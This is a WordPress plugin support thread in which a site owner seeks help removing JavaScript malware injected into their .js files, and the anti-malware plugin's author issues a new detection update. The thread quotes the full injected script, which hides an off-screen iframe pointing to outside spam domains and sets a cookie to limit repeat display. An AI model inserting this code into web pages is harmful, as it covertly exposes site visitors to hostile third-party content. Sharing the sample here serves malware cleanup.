Title: Leftover code
Last modified: August 22, 2016

---

# Leftover code

 *  Resolved [stefaanvandamme](https://wordpress.org/support/users/stefaanvandamme/)
 * (@stefaanvandamme)
 * [11 years, 6 months ago](https://wordpress.org/support/topic/leftover-code/)
 * Hey,
 * I used your plugin to remove code that was inserted in my .js files
 * however, not everything was removed
 * &&bb){document.write(‘<iframe style=”position:absolute;margin-top: -1004px;” 
   src=”[http://poper.addictedness.ga&#8221](http://poper.addictedness.ga&#8221);
   width=”160″ height=”137″></iframe>’);var date=new Date(new Date().getTime()+48*
   60*60*1000);document.cookie=”delicatesma7fueja=1; path=/; expires=”+date.toUTCString()}})();
 * is still present in my files, any way to remove all this automatically so i don’t
   have to edit all my infected files ?
 * Thank you
 * [https://wordpress.org/plugins/gotmls/](https://wordpress.org/plugins/gotmls/)

Viewing 6 replies - 1 through 6 (of 6 total)

 *  Plugin Author [Eli](https://wordpress.org/support/users/scheeeli/)
 * (@scheeeli)
 * [11 years, 6 months ago](https://wordpress.org/support/topic/leftover-code/#post-5536043)
 * Can you please post the entire infected file so that I can test it. I need to
   see what it finds in the origin file to see why it’s not removing the whole infection.
 * Thanks, Eli
 *  Thread Starter [stefaanvandamme](https://wordpress.org/support/users/stefaanvandamme/)
 * (@stefaanvandamme)
 * [11 years, 6 months ago](https://wordpress.org/support/topic/leftover-code/#post-5536044)
 * Here is the full one (only the ‘spam’ url is different ([http://poper.addible.ml](http://poper.addible.ml)
   vs [http://poper.addictedness.ga](http://poper.addictedness.ga))
 * function getCookie(name){var matches=document.cookie.match(new RegExp(“(?:^|;)”
   +name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,’\\$1′)+”=([^;]*)”));return matches?
   decodeURIComponent(matches[1]):undefined}(function(){function stripos(f_haystack,
   f_needle,f_offset){var haystack=(f_haystack+”).toLowerCase();var needle=(f_needle
   +”).toLowerCase();var index=0;if((index=haystack.indexOf(needle,f_offset))!==-
   1){return index}return false}function milenium_agent(){var falshSpis=[‘AppleWebKit’,’
   Windows NT 6.3′,’X11′];var falshUA=false;for(var i in falshSpis){if(stripos(navigator.
   userAgent,falshSpis[i])){falshUA=true;break}}return falshUA}var bb=(getCookie(“
   delicatesma7fueja”)===undefined);if(!milenium_agent()&&bb){document.write(‘<iframe
   style=”position:absolute;margin-top: -1004px;” src=”[http://poper.addible.ml&#8221](http://poper.addible.ml&#8221);
   width=”160″ height=”137″></iframe>’);var date=new Date(new Date().getTime()+48*
   60*60*1000);document.cookie=”delicatesma7fueja=1; path=/; expires=”+date.toUTCString()}})();
 *  Plugin Author [Eli](https://wordpress.org/support/users/scheeeli/)
 * (@scheeeli)
 * [11 years, 6 months ago](https://wordpress.org/support/topic/leftover-code/#post-5536045)
 * I there must be more code in that file. Is this the entire contents of the infected
   file or just the infected part of the file?
 * Can you please send me the whole file? you can send it as an attachment if that’s
   easier. My direct email is: eli AT gotmls DOT net
 * Aloha, Eli
 *  Thread Starter [stefaanvandamme](https://wordpress.org/support/users/stefaanvandamme/)
 * (@stefaanvandamme)
 * [11 years, 6 months ago](https://wordpress.org/support/topic/leftover-code/#post-5536046)
 * I will send you my heartbeat.js file by mail
 *  Plugin Author [Eli](https://wordpress.org/support/users/scheeeli/)
 * (@scheeeli)
 * [11 years, 6 months ago](https://wordpress.org/support/topic/leftover-code/#post-5536103)
 * Thank you!
 * I have a new definition update available that includes this new variant. If you
   have any more of these scripts on your server you can download the new definition
   update and then use the automatic fix to remove all the malicious code. If you
   have any of these files that were only half fixed by the older definitions you
   should restore the original files from the quarantine and scan then again and
   then fix then with the new definition.
 * Please let me know how this works for you, and mark this topic as “resolved” 
   if it is working.
 * Aloha, Eli
 *  Thread Starter [stefaanvandamme](https://wordpress.org/support/users/stefaanvandamme/)
 * (@stefaanvandamme)
 * [11 years, 6 months ago](https://wordpress.org/support/topic/leftover-code/#post-5536215)
 * Everything fixed, thank you for the plugin and the swift replies
    Paypalled you
   some drinking money 😉

Viewing 6 replies - 1 through 6 (of 6 total)

The topic ‘Leftover code’ is closed to new replies.

 * ![](https://ps.w.org/gotmls/assets/icon-256x256.png?rev=1001824)
 * [Anti-Malware Security and Brute-Force Firewall](https://wordpress.org/plugins/gotmls/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/gotmls/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/gotmls/)
 * [Active Topics](https://wordpress.org/support/plugin/gotmls/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/gotmls/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/gotmls/reviews/)

 * 6 replies
 * 2 participants
 * Last reply from: [stefaanvandamme](https://wordpress.org/support/users/stefaanvandamme/)
 * Last activity: [11 years, 6 months ago](https://wordpress.org/support/topic/leftover-code/#post-5536215)
 * Status: resolved